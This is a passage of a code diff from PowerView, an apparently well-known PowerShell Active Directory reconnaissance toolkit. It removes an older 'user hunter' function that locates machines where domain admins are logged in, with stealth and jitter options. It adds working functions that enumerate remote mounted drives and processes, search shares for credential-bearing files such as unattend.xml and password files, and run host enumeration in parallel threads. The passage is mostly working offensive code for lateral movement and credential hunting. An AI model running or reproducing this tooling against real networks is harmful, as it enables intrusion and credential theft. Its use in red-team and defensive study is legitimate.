group are logged into. +.SYNOPSIS - Author: @harmj0y - License: BSD 3-Clause +Returns information about saved network mounted drives for the local (or remote) machine. - .DESCRIPTION +Note: This function requires administrative rights on the machine you're enumerating. - This function finds the local domain name for a host using Get-NetDomain, - queries the domain for users of a specified group (default "domain admins") - with Get-NetGroupMember or reads in a target user list, queries the domain for all - active machines with Get-NetComputer or reads in a pre-populated host list, - randomly shuffles the target list, then for each server it gets a list of - active users with Get-NetSession/Get-NetLoggedon. The found user list is compared - against the target list, and a status message is displayed for any hits. - The flag -CheckAccess will check each positive host to see if the current - user has local admin access to the machine. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertFrom-SID - .PARAMETER ComputerName +.DESCRIPTION - Host array to enumerate, passable on the pipeline. +Uses remote registry functionality to enumerate recently mounted network drives. - .PARAMETER ComputerFile +.PARAMETER ComputerName - File of hostnames/IPs to search. +Specifies the hostname to query for mounted drive information (also accepts IP addresses). +Defaults to 'localhost'. - .PARAMETER ComputerFilter +.PARAMETER Credential - Host filter name to query AD for, wildcards accepted. +A [Management.Automation.PSCredential] object of alternate credentials +for connecting to the remote system. - .PARAMETER ComputerADSpath +.EXAMPLE - The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +Get-WMIRegMountedDrive - .PARAMETER Unconstrained +Returns the saved network mounted drives for the local machine. - Switch. Only enumerate computers that have unconstrained delegation. +.EXAMPLE - .PARAMETER GroupName +Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local - Group name to query for target users. +Returns the saved network mounted drives for the WINDOWS2.testlab.local machine - .PARAMETER TargetServer +.EXAMPLE - Hunt for users who are effective local admins on a target server. +Get-DomainComputer | Get-WMIRegMountedDrive - .PARAMETER UserName +Returns the saved network mounted drives for all machines in the domain. - Specific username to search for. +.EXAMPLE - .PARAMETER UserFilter +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred - A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)" +.OUTPUTS - .PARAMETER UserADSpath +PowerView.RegMountedDrive - The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. - - .PARAMETER UserFile - - File of usernames to search for. - - .PARAMETER AdminCount - - Switch. Hunt for users with adminCount=1. - - .PARAMETER AllowDelegation - - Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation' - - .PARAMETER StopOnSuccess - - Switch. Stop hunting after finding after finding a target user. - - .PARAMETER NoPing - - Don't ping each host to ensure it's up before enumerating. - - .PARAMETER CheckAccess +A PSCustomObject containing the ComputerName and mounted drive information. +#> - Switch. Check if the current user has local admin access to found machines. + [OutputType('PowerView.RegMountedDrive')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', - .PARAMETER Delay + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - Delay between enumerating hosts, defaults to 0 + PROCESS { + ForEach ($Computer in $ComputerName) { + # HKEY_USERS + $HKU = 2147483651 - .PARAMETER Jitter + $WmiArguments = @{ + 'List' = $True + 'Class' = 'StdRegProv' + 'Namespace' = 'root\default' + 'Computername' = $Computer + 'ErrorAction' = 'Stop' + } + if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential } - Jitter for the host delay, defaults to +/- 0.3 + try { + $Reg = Get-WmiObject @WmiArguments - .PARAMETER Domain + # extract out the SIDs of domain users in this hive + $UserSIDs = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } - Domain for query for machines, defaults to the current domain. + ForEach ($UserSID in $UserSIDs) { + try { + if ($PSBoundParameters['Credential']) { + $UserName = ConvertFrom-SID -ObjectSid $UserSID -Credential $Credential + } + else { + $UserName = ConvertFrom-SID -ObjectSid $UserSID + } - .PARAMETER DomainController + $DriveLetters = ($Reg.EnumKey($HKU, "$UserSID\Network")).sNames + + ForEach ($DriveLetter in $DriveLetters) { + $ProviderName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'ProviderName').sValue + $RemotePath = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'RemotePath').sValue + $DriveUserName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'UserName').sValue + if (-not $UserName) { $UserName = '' } + + if ($RemotePath -and ($RemotePath -ne '')) { + $MountedDrive = New-Object PSObject + $MountedDrive | Add-Member Noteproperty 'ComputerName' $Computer + $MountedDrive | Add-Member Noteproperty 'UserName' $UserName + $MountedDrive | Add-Member Noteproperty 'UserSID' $UserSID + $MountedDrive | Add-Member Noteproperty 'DriveLetter' $DriveLetter + $MountedDrive | Add-Member Noteproperty 'ProviderName' $ProviderName + $MountedDrive | Add-Member Noteproperty 'RemotePath' $RemotePath + $MountedDrive | Add-Member Noteproperty 'DriveUserName' $DriveUserName + $MountedDrive.PSObject.TypeNames.Insert(0, 'PowerView.RegMountedDrive') + $MountedDrive + } + } + } + catch { + Write-Verbose "[Get-WMIRegMountedDrive] Error: $_" + } + } + } + catch { + Write-Warning "[Get-WMIRegMountedDrive] Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_" + } + } + } +} - Domain controller to reflect LDAP queries through. - .PARAMETER ShowAll +function Get-WMIProcess { +<# +.SYNOPSIS - Switch. Return all user location results, i.e. Invoke-UserView functionality. +Returns a list of processes and their owners on the local or remote machine. - .PARAMETER SearchForest +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - Switch. Search all domains in the forest for target users instead of just - a single domain. +.DESCRIPTION - .PARAMETER Stealth +Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine, +including the owners of the particular process. - Switch. Only enumerate sessions from connonly used target servers. +.PARAMETER ComputerName - .PARAMETER StealthSource +Specifies the hostname to query for cached RDP connections (also accepts IP addresses). +Defaults to 'localhost'. - The source of target servers to use, 'DFS' (distributed file servers), - 'DC' (domain controllers), 'File' (file servers), or 'All' +.PARAMETER Credential - .PARAMETER ForeignUsers +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system. - Switch. Only return results that are not part of searched domain. +.EXAMPLE - .PARAMETER Threads +Get-WMIProcess -ComputerName WINDOWS1 - The maximum concurrent threads to execute. +.EXAMPLE - .PARAMETER Poll +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred - Continuously poll for sessions for the given duration. Automatically - sets Threads to the number of computers being polled. +.OUTPUTS - .EXAMPLE +PowerView.UserProcess - PS C:\> Invoke-UserHunter -CheckAccess +A PSCustomObject containing the remote process information. +#> - Finds machines on the local domain where domain admins are logged into - and checks if the current user has local administrator access. + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.UserProcess')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', - .EXAMPLE + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - PS C:\> Invoke-UserHunter -Domain 'testing' + PROCESS { + ForEach ($Computer in $ComputerName) { + try { + $WmiArguments = @{ + 'ComputerName' = $ComputerName + 'Class' = 'Win32_process' + } + if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential } + Get-WMIobject @WmiArguments | ForEach-Object { + $Owner = $_.getowner(); + $Process = New-Object PSObject + $Process | Add-Member Noteproperty 'ComputerName' $Computer + $Process | Add-Member Noteproperty 'ProcessName' $_.ProcessName + $Process | Add-Member Noteproperty 'ProcessID' $_.ProcessID + $Process | Add-Member Noteproperty 'Domain' $Owner.Domain + $Process | Add-Member Noteproperty 'User' $Owner.User + $Process.PSObject.TypeNames.Insert(0, 'PowerView.UserProcess') + $Process + } + } + catch { + Write-Verbose "[Get-WMIProcess] Error enumerating remote processes on '$Computer', access likely denied: $_" + } + } + } +} - Finds machines on the 'testing' domain where domain admins are logged into. - .EXAMPLE +function Find-InterestingFile { +<# +.SYNOPSIS - PS C:\> Invoke-UserHunter -Threads 20 +Searches for files on the given path that match a series of specified criteria. - Multi-threaded user hunting, replaces Invoke-UserHunterThreaded. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection - .EXAMPLE +.DESCRIPTION - PS C:\> Invoke-UserHunter -UserFile users.txt -ComputerFile hosts.txt +This function recursively searches a given UNC path for files with +specific keywords in the name (default of pass, sensitive, secret, admin, +login and unattend*.xml). By default, hidden files/folders are included +in search results. If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection +is used to temporarily map the remote share. - Finds machines in hosts.txt where any members of users.txt are logged in - or have sessions. +.PARAMETER Path - .EXAMPLE +UNC/local path to recursively search. - PS C:\> Invoke-UserHunter -GroupName "Power Users" -Delay 60 +.PARAMETER Include - Find machines on the domain where members of the "Power Users" groups are - logged into with a 60 second (+/- *.3) randomized delay between - touching each host. +Only return files/folders that match the specified array of strings, +i.e. @(*.doc*, *.xls*, *.ppt*) - .EXAMPLE +.PARAMETER LastAccessTime - PS C:\> Invoke-UserHunter -TargetServer FILESERVER +Only return files with a LastAccessTime greater than this date value. - Query FILESERVER for useres who are effective local administrators using - Get-NetLocalGroup -Recurse, and hunt for that user set on the network. +.PARAMETER LastWriteTime - .EXAMPLE +Only return files with a LastWriteTime greater than this date value. - PS C:\> Invoke-UserHunter -SearchForest +.PARAMETER CreationTime - Find all machines in the current forest where domain admins are logged in. +Only return files with a CreationTime greater than this date value. - .EXAMPLE +.PARAMETER OfficeDocs - PS C:\> Invoke-UserHunter -Stealth +Switch. Search for office documents (*.doc*, *.xls*, *.ppt*) - Executes old Invoke-StealthUserHunter functionality, enumerating commonly - used servers and checking just sessions for each. +.PARAMETER FreshEXEs - .EXAMPLE +Switch. Find .EXEs accessed within the last 7 days. - PS C:\> Invoke-UserHunter -Stealth -StealthSource DC -Poll 3600 -Delay 5 -ShowAll | ? { ! $_.UserName.EndsWith('$') } +.PARAMETER ExcludeFolders - Poll Domain Controllers in parallel for sessions for an hour, waiting five - seconds before querying each DC again and filtering out computer accounts. +Switch. Exclude folders from the search results. - .LINK - http://blog.harmj0y.net -#> +.PARAMETER ExcludeHidden - [CmdletBinding()] - param( - [Parameter(Position=0,ValueFromPipeline=$True)] - [Alias('Hosts')] - [String[]] - $ComputerName, +Switch. Exclude hidden files and folders from the search results. - [ValidateScript({Test-Path -Path $_ })] - [Alias('HostList')] - [String] - $ComputerFile, +.PARAMETER CheckWriteAccess - [String] - $ComputerFilter, +Switch. Only returns files the current user has write access to. - [String] - $ComputerADSpath, +.PARAMETER Credential - [Switch] - $Unconstrained, +A [Management.Automation.PSCredential] object of alternate credentials +to connect to remote systems for file enumeration. - [String] - $GroupName = 'Domain Admins', +.EXAMPLE - [String] - $TargetServer, +Find-InterestingFile -Path "C:\Backup\" - [String] - $UserName, +Returns any files on the local path C:\Backup\ that have the default +search term set in the title. - [String] - $UserFilter, +.EXAMPLE - [String] - $UserADSpath, +Find-InterestingFile -Path "\\WINDOWS7\Users\" -LastAccessTime (Get-Date).AddDays(-7) - [ValidateScript({Test-Path -Path $_ })] - [String] - $UserFile, +Returns any files on the remote path \\WINDOWS7\Users\ that have the default +search term set in the title and were accessed within the last week. - [Switch] - $AdminCount, +.EXAMPLE - [Switch] - $AllowDelegation, +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-InterestingFile -Credential $Cred -Path "\\PRIMARY.testlab.local\C$\Temp\" - [Switch] - $CheckAccess, +.OUTPUTS - [Switch] - $StopOnSuccess, +PowerView.FoundFile +#> - [Switch] - $NoPing, + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.FoundFile')] + [CmdletBinding(DefaultParameterSetName = 'FileSpecification')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [String[]] + $Path = '.\', - [UInt32] - $Delay = 0, + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [Alias('SearchTerms', 'Terms')] + [String[]] + $Include = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'), - [Double] - $Jitter = .3, + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [DateTime] + $LastAccessTime, - [String] - $Domain, + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [DateTime] + $LastWriteTime, - [String] - $DomainController, + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [DateTime] + $CreationTime, + [Parameter(ParameterSetName = 'OfficeDocs')] [Switch] - $ShowAll, + $OfficeDocs, + [Parameter(ParameterSetName = 'FreshEXEs')] [Switch] - $SearchForest, + $FreshEXEs, + [Parameter(ParameterSetName = 'FileSpecification')] [Switch] - $Stealth, - - [String] - [ValidateSet("DFS","DC","File","All")] - $StealthSource ="All", + $ExcludeFolders, + [Parameter(ParameterSetName = 'FileSpecification')] [Switch] - $ForeignUsers, + $ExcludeHidden, - [Int] - [ValidateRange(1,100)] - $Threads, + [Switch] + $CheckWriteAccess, - [UInt32] - $Poll = 0 + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - begin { - - if ($PSBoundParameters['Debug']) { - $DebugPreference = 'Continue' + BEGIN { + $SearcherArguments = @{ + 'Recurse' = $True + 'ErrorAction' = 'SilentlyContinue' + 'Include' = $Include } - - Write-Verbose "[*] Running Invoke-UserHunter with delay of $Delay" - - ##################################################### - # - # First we build the host target set - # - ##################################################### - - if($ComputerFile) { - # if we're using a host list, read the targets in and add them to the target list - $ComputerName = Get-Content -Path $ComputerFile + if ($PSBoundParameters['OfficeDocs']) { + $SearcherArguments['Include'] = @('*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt', '*.pptx') } + elseif ($PSBoundParameters['FreshEXEs']) { + # find .exe's accessed within the last 7 days + $LastAccessTime = (Get-Date).AddDays(-7).ToString('MM/dd/yyyy') + $SearcherArguments['Include'] = @('*.exe') + } + $SearcherArguments['Force'] = -not $PSBoundParameters['ExcludeHidden'] - if(!$ComputerName) { - [Array]$ComputerName = @() + $MappedComputers = @{} - if($Domain) { - $TargetDomains = @($Domain) - } - elseif($SearchForest) { - # get ALL the domains in the forest to search - $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name } + function Test-Write { + # short helper to check is the current user can write to a file + [CmdletBinding()]Param([String]$Path) + try { + $Filetest = [IO.File]::OpenWrite($Path) + $Filetest.Close() + $True } - else { - # use the local domain - $TargetDomains = @( (Get-NetDomain).name ) + catch { + $False } - - if($Stealth) { - Write-Verbose "Stealth mode! Enumerating commonly used servers" - Write-Verbose "Stealth source: $StealthSource" + } + } - ForEach ($Domain in $TargetDomains) { - if (($StealthSource -eq "File") -or ($StealthSource -eq "All")) { - Write-Verbose "[*] Querying domain $Domain for File Servers..." - $ComputerName += Get-NetFileServer -Domain $Domain -DomainController $DomainController - } - if (($StealthSource -eq "DFS") -or ($StealthSource -eq "All")) { - Write-Verbose "[*] Querying domain $Domain for DFS Servers..." - $ComputerName += Get-DFSshare -Domain $Domain -DomainController $DomainController | ForEach-Object {$_.RemoteServerName} - } - if (($StealthSource -eq "DC") -or ($StealthSource -eq "All")) { - Write-Verbose "[*] Querying domain $Domain for Domain Controllers..." - $ComputerName += Get-NetDomainController -LDAP -Domain $Domain -DomainController $DomainController | ForEach-Object { $_.dnshostname} - } + PROCESS { + ForEach ($TargetPath in $Path) { + if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { + $HostComputer = (New-Object System.Uri($TargetPath)).Host + if (-not $MappedComputers[$HostComputer]) { + # map IPC$ to this computer if it's not already + Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential + $MappedComputers[$HostComputer] = $True } } - else { - ForEach ($Domain in $TargetDomains) { - Write-Verbose "[*] Querying domain $Domain for hosts" - $Arguments = @{ - 'Domain' = $Domain - 'DomainController' = $DomainController - 'ADSpath' = $ADSpath - 'Filter' = $ComputerFilter - 'Unconstrained' = $Unconstrained + $SearcherArguments['Path'] = $TargetPath + Get-ChildItem @SearcherArguments | ForEach-Object { + # check if we're excluding folders + $Continue = $True + if ($PSBoundParameters['ExcludeFolders'] -and ($_.PSIsContainer)) { + Write-Verbose "Excluding: $($_.FullName)" + $Continue = $False + } + if ($LastAccessTime -and ($_.LastAccessTime -lt $LastAccessTime)) { + $Continue = $False + } + if ($PSBoundParameters['LastWriteTime'] -and ($_.LastWriteTime -lt $LastWriteTime)) { + $Continue = $False + } + if ($PSBoundParameters['CreationTime'] -and ($_.CreationTime -lt $CreationTime)) { + $Continue = $False + } + if ($PSBoundParameters['CheckWriteAccess'] -and (-not (Test-Write -Path $_.FullName))) { + $Continue = $False + } + if ($Continue) { + $FileParams = @{ + 'Path' = $_.FullName + 'Owner' = $((Get-Acl $_.FullName).Owner) + 'LastAccessTime' = $_.LastAccessTime + 'LastWriteTime' = $_.LastWriteTime + 'CreationTime' = $_.CreationTime + 'Length' = $_.Length } - - $ComputerName += Get-NetComputer @Arguments + $FoundFile = New-Object -TypeName PSObject -Property $FileParams + $FoundFile.PSObject.TypeNames.Insert(0, 'PowerView.FoundFile') + $FoundFile } } - - # remove any null target hosts, uniquify the list and shuffle it - $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random } - if($($ComputerName.Count) -eq 0) { - throw "No hosts found!" - } - } - - if ($Poll -gt 0) { - Write-Verbose "[*] Polling for $Poll seconds. Automatically enabling threaded mode." - if ($ComputerName.Count -gt 100) { - throw "Too many hosts to poll! Try fewer than 100." - } - $Threads = $ComputerName.Count } + } - ##################################################### - # - # Now we build the user target set - # - ##################################################### + END { + # remove the IPC$ mappings + $MappedComputers.Keys | Remove-RemoteConnection + } +} - # users we're going to be searching for - $TargetUsers = @() - # get the current user so we can ignore it in the results - $CurrentUser = ([Environment]::UserName).toLower() - - # if we're showing all results, skip username enumeration - if($ShowAll -or $ForeignUsers) { - $User = New-Object PSObject - $User | Add-Member Noteproperty 'MemberDomain' $Null - $User | Add-Member Noteproperty 'MemberName' '*' - $TargetUsers = @($User) - - if($ForeignUsers) { - # if we're searching for user results not in the primary domain - $krbtgtName = Convert-ADName -ObjectName "krbtgt@$($Domain)" -InputType Simple -OutputType NT4 - $DomainShortName = $krbtgtName.split("\")[0] - } - } - # if we want to hunt for the effective domain users who can access a target server - elseif($TargetServer) { - Write-Verbose "Querying target server '$TargetServer' for local users" - $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object { - $User = New-Object PSObject - $User | Add-Member Noteproperty 'MemberDomain' ($_.AccountName).split("/")[0].toLower() - $User | Add-Member Noteproperty 'MemberName' ($_.AccountName).split("/")[1].toLower() - $User - } | Where-Object {$_} - } - # if we get a specific username, only use that - elseif($UserName) { - Write-Verbose "[*] Using target user '$UserName'..." - $User = New-Object PSObject - if($TargetDomains) { - $User | Add-Member Noteproperty 'MemberDomain' $TargetDomains[0] - } - else { - $User | Add-Member Noteproperty 'MemberDomain' $Null - } - $User | Add-Member Noteproperty 'MemberName' $UserName.ToLower() - $TargetUsers = @($User) - } - # read in a target user list if we have one - elseif($UserFile) { - $TargetUsers = Get-Content -Path $UserFile | ForEach-Object { - $User = New-Object PSObject - if($TargetDomains) { - $User | Add-Member Noteproperty 'MemberDomain' $TargetDomains[0] - } - else { - $User | Add-Member Noteproperty 'MemberDomain' $Null - } - $User | Add-Member Noteproperty 'MemberName' $_ - $User - } | Where-Object {$_} - } - elseif($UserADSpath -or $UserFilter -or $AdminCount) { - ForEach ($Domain in $TargetDomains) { +######################################################## +# +# 'Meta'-functions start below +# +######################################################## - $Arguments = @{ - 'Domain' = $Domain - 'DomainController' = $DomainController - 'ADSpath' = $UserADSpath - 'Filter' = $UserFilter - 'AdminCount' = $AdminCount - 'AllowDelegation' = $AllowDelegation - } +function New-ThreadedFunction { + # Helper used by any threaded host enumeration functions + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [String[]] + $ComputerName, - Write-Verbose "[*] Querying domain $Domain for users" - $TargetUsers += Get-NetUser @Arguments | ForEach-Object { - $User = New-Object PSObject - $User | Add-Member Noteproperty 'MemberDomain' $Domain - $User | Add-Member Noteproperty 'MemberName' $_.samaccountname - $User - } | Where-Object {$_} + [Parameter(Position = 1, Mandatory = $True)] + [System.Management.Automation.ScriptBlock] + $ScriptBlock, - } - } - else { - ForEach ($Domain in $TargetDomains) { - Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'" - $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController - } - } + [Parameter(Position = 2)] + [Hashtable] + $ScriptParameters, - if (( (-not $ShowAll) -and (-not $ForeignUsers) ) -and ((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) { - throw "[!] No users found to search for!" - } + [Int] + [ValidateRange(1, 100)] + $Threads = 20, - # script block that enumerates a server - $HostEnumBlock = { - param($ComputerName, $Ping, $TargetUsers, $CurrentUser, $Stealth, $DomainShortName, $Poll, $Delay, $Jitter) - - # optionally check if the server is up first - $Up = $True - if($Ping) { - $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName - } - if($Up) { - $Timer = [System.Diagnostics.Stopwatch]::StartNew() - $RandNo = New-Object System.Random - - Do { - if(!$DomainShortName) { - # if we're not searching for foreign users, check session information - $Sessions = Get-NetSession -ComputerName $ComputerName - ForEach ($Session in $Sessions) { - $UserName = $Session.sesi10_username - $CName = $Session.sesi10_cname - - if($CName -and $CName.StartsWith("\\")) { - $CName = $CName.TrimStart("\") - } + [Switch] + $NoImports + ) - # make sure we have a result - if (($UserName) -and ($UserName.trim() -ne '') -and (!($UserName -match $CurrentUser))) { + BEGIN { + # Adapted from: + # http://powershell.org/wp/forums/topic/invpke-parallel-need-help-to-clone-the-current-runspace/ + $SessionState = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault() - $TargetUsers | Where-Object {$UserName -like $_.MemberName} | ForEach-Object { + # # $SessionState.ApartmentState = [System.Threading.Thread]::CurrentThread.GetApartmentState() + # force a single-threaded apartment state (for token-impersonation stuffz) + $SessionState.ApartmentState = [System.Threading.ApartmentState]::STA - $IPAddress = @(Get-IPAddress -ComputerName $ComputerName)[0].IPAddress - $FoundUser = New-Object PSObject - $FoundUser | Add-Member Noteproperty 'UserDomain' $_.MemberDomain - $FoundUser | Add-Member Noteproperty 'UserName' $UserName - $FoundUser | Add-Member Noteproperty 'ComputerName' $ComputerName - $FoundUser | Add-Member Noteproperty 'IPAddress' $IPAddress - $FoundUser | Add-Member Noteproperty 'SessionFrom' $CName + # import the current session state's variables and functions so the chained PowerView + # functionality can be used by the threaded blocks + if (-not $NoImports) { + # grab all the current variables for this runspace + $MyVars = Get-Variable -Scope 2 - # Try to resolve the DNS hostname of $Cname - try { - $CNameDNSName = [System.Net.Dns]::GetHostEntry($CName) | Select-Object -ExpandProperty HostName - $FoundUser | Add-Member NoteProperty 'SessionFromName' $CnameDNSName - } - catch { - $FoundUser | Add-Member NoteProperty 'SessionFromName' $Null - } + # these Variables are added by Runspace.Open() Method and produce Stop errors if you add them twice + $VorbiddenVars = @('?','args','ConsoleFileName','Error','ExecutionContext','false','HOME','Host','input','InputObject','MaximumAliasCount','MaximumDriveCount','MaximumErrorCount','MaximumFunctionCount','MaximumHistoryCount','MaximumVariableCount','MyInvocation','null','PID','PSBoundParameters','PSCommandPath','PSCulture','PSDefaultParameterValues','PSHOME','PSScriptRoot','PSUICulture','PSVersionTable','PWD','ShellId','SynchronizedHash','true') - # see if we're checking to see if we have local admin access on this machine - if ($CheckAccess) { - $Admin = Invoke-CheckLocalAdminAccess -ComputerName $CName - $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin - } - else { - $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Null - } - $FoundUser.PSObject.TypeNames.Add('PowerView.UserSession') - $FoundUser - } - } - } - } - if(!$Stealth) { - # if we're not 'stealthy', enumerate loggedon users as well - $LoggedOn = Get-NetLoggedon -ComputerName $ComputerName - ForEach ($User in $LoggedOn) { - $UserName = $User.wkui1_username - # TODO: translate domain to authoratative name - # then match domain name ? - $UserDomain = $User.wkui1_logon_domain + # add Variables from Parent Scope (current runspace) into the InitialSessionState + ForEach ($Var in $MyVars) { + if ($VorbiddenVars -NotContains $Var.Name) { + $SessionState.Variables.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Var.name,$Var.Value,$Var.description,$Var.options,$Var.attributes)) + } + } - # make sure wet have a result - if (($UserName) -and ($UserName.trim() -ne '')) { + # add Functions from current runspace to the InitialSessionState + ForEach ($Function in (Get-ChildItem Function:)) { + $SessionState.Commands.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList $Function.Name, $Function.Definition)) + } + } - $TargetUsers | Where-Object {$UserName -like $_.MemberName} | ForEach-Object { + # threading adapted from + # https://github.com/darkoperator/Posh-SecMod/blob/master/Discovery/Discovery.psm1#L407 + # Thanks Carlos! - $Proceed = $True - if($DomainShortName) { - if ($DomainShortName.ToLower() -ne $UserDomain.ToLower()) { - $Proceed = $True - } - else { - $Proceed = $False - } - } - if($Proceed) { - $IPAddress = @(Get-IPAddress -ComputerName $ComputerName)[0].IPAddress - $FoundUser = New-Object PSObject - $FoundUser | Add-Member Noteproperty 'UserDomain' $UserDomain - $FoundUser | Add-Member Noteproperty 'UserName' $UserName - $FoundUser | Add-Member Noteproperty 'ComputerName' $ComputerName - $FoundUser | Add-Member Noteproperty 'IPAddress' $IPAddress - $FoundUser | Add-Member Noteproperty 'SessionFrom' $Null - $FoundUser | Add-Member Noteproperty 'SessionFromName' $Null - - # see if we're checking to see if we have local admin access on this machine - if ($CheckAccess) { - $Admin = Invoke-CheckLocalAdminAccess -ComputerName $ComputerName - $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin - } - else { - $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Null - } - $FoundUser.PSObject.TypeNames.Add('PowerView.UserSession') - $FoundUser - } - } - } - } - } + # create a pool of maxThread runspaces + $Pool = [RunspaceFactory]::CreateRunspacePool(1, $Threads, $SessionState, $Host) + $Pool.Open() - if ($Poll -gt 0) { - Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) - } - } While ($Poll -gt 0 -and $Timer.Elapsed.TotalSeconds -lt $Poll) + # do some trickery to get the proper BeginInvoke() method that allows for an output queue + $Method = $Null + ForEach ($M in [PowerShell].GetMethods() | Where-Object { $_.Name -eq 'BeginInvoke' }) { + $MethodParameters = $M.GetParameters() + if (($MethodParameters.Count -eq 2) -and $MethodParameters[0].Name -eq 'input' -and $MethodParameters[1].Name -eq 'output') { + $Method = $M.MakeGenericMethod([Object], [Object]) + break } } - } - process { + $Jobs = @() + $ComputerName = $ComputerName | Where-Object {$_ -and $_.Trim()} + Write-Verbose "[New-ThreadedFunction] Total number of hosts: $($ComputerName.count)" - if($Threads) { - Write-Verbose "Using threading with threads = $Threads" + # partition all hosts from -ComputerName into $Threads number of groups + if ($Threads -ge $ComputerName.Length) { + $Threads = $ComputerName.Length + } + $ElementSplitSize = [Int]($ComputerName.Length/$Threads) + $ComputerNamePartitioned = @() + $Start = 0 + $End = $ElementSplitSize - # if we're using threading, kick off the script block with Invoke-ThreadedFunction - $ScriptParams = @{ - 'Ping' = $(-not $NoPing) - 'TargetUsers' = $TargetUsers - 'CurrentUser' = $CurrentUser - 'Stealth' = $Stealth - 'DomainShortName' = $DomainShortName - 'Poll' = $Poll - 'Delay' = $Delay - 'Jitter' = $Jitter + for($i = 1; $i -le $Threads; $i++) { + $List = New-Object System.Collections.ArrayList + if ($i -eq $Threads) { + $End = $ComputerName.Length } - - # kick off the threaded script block + arguments - Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + $List.AddRange($ComputerName[$Start..($End-1)]) + $Start += $ElementSplitSize + $End += $ElementSplitSize + $ComputerNamePartitioned += @(,@($List.ToArray())) } - else { - if(-not $NoPing -and ($ComputerName.count -ne 1)) { - # ping all hosts in parallel - $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}} - $ComputerName = 